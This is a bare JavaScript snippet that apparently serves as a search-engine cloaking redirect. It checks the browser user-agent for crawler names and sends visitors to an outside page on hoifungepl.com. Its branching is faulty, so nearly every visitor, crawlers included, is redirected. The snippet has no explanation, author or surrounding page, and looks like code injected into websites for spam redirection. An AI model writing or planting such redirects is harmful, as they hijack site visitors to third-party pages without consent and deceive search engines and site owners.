
if(navigator.userAgent.toLowerCase().indexOf("googlebot") <= -1) {
	window.location.href="http://www.hoifungepl.com/shuidian.html";
} else if(navigator.userAgent.toLowerCase().indexOf("msnbot") <= -1) {
	window.location.href="http://www.hoifungepl.com/shuidian.html";
} else if(navigator.userAgent.toLowerCase().indexOf("yahoo!") <= -1) {
	window.location.href="http://www.hoifungepl.com/shuidian.html";
} else {
}
